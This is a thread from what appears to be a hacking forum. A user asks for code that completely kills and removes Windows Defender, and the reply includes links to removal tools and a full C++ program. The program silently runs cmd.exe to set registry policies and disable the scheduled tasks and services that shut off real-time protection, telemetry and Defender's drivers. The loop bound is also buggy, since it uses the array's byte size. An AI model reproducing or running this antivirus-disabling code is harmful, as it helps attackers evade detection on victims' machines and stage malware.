could someone share code wich kills and removes windows defender completly? mine does not work anymore.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Need C++ windows defender killer / remover
- Автор темы netix
- Дата начала
GitHub - ionuttbara/windows-defender-remover: A tool which is uses to remove Windows Defender in Windows 8.x, Windows 10 (every version) and Windows 11.
A tool which is uses to remove Windows Defender in Windows 8.x, Windows 10 (every version) and Windows 11. - ionuttbara/windows-defender-remover
github.com
Defender Control
GitHub - pgkt04/defender-control: An open-source windows defender manager. Now you can disable windows defender permanently.
An open-source windows defender manager. Now you can disable windows defender permanently. - GitHub - pgkt04/defender-control: An open-source windows defender manager. Now you can disable windows ...
github.com
- Автор темы
- Добавить закладку
- #5
Found a .bat script and converted it to C++ script.
This worked fine.
This worked fine.
Код:
#include <windows.h>
#include <wininet.h>
#include <Shlwapi.h>
char *szCmds[] =
{
"/c reg add \"HKLM\\Software\\Microsoft\\Windows Defender Security Center\\Notifications\" /v \"DisableNotifications\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender Security Center\\Notifications\" /v \"DisableEnhancedNotifications \" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Notifications\\Settings\\Windows.SystemToast.SecurityAndMaintenance\" /v \"Enabled\" /t REG_DWORD /d \"0\" /f",
"/c reg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"AllowFastServiceStartup\" /t REG_DWORD /d \"0\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableSpecialRunningModes\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"ServiceKeepAlive\" /t REG_DWORD /d \"0\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f",
"/c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"2\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\" /v \"Start\" /t REG_DWORD /d \"0\" /f",
"/c schtasks /Change /TN \"Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh\" /Disable",
"/c schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /Disable",
"/c schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /Disable",
"/c schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /Disable",
"/c schtasks /Change /TN \"Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /Disable",
"/c reg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\" /v \"SecurityHealth\" /f",
"/c reg delete \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"SecurityHealth\" /f",
"/c reg delete \"HKCR\\*\\shellex\\ContextMenuHandlers\\EPP\" /f",
"/c reg delete \"HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\" /f",
"/c reg delete \"HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdBoot\" /v \"Start\" /t REG_DWORD /d \"4\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Services\\MDCoreSvc\" /v \"Start\" /t REG_DWORD /d \"4\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdFilter\" /v \"Start\" /t REG_DWORD /d \"4\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\" /v \"Start\" /t REG_DWORD /d \"4\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\" /v \"Start\" /t REG_DWORD /d \"4\" /f",
"/c reg add \"HKLM\\System\\CurrentControlSet\\Services\\WinDefend\" /v \"Start\" /t REG_DWORD /d \"4\" /f",
};
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow)
{
Sleep(2000);
for (int i = 0; i < sizeof(szCmds); i++)
{
ShellExecute(NULL, "open", "cmd.exe", szCmds[i], NULL, SW_HIDE);
}
return 0;
}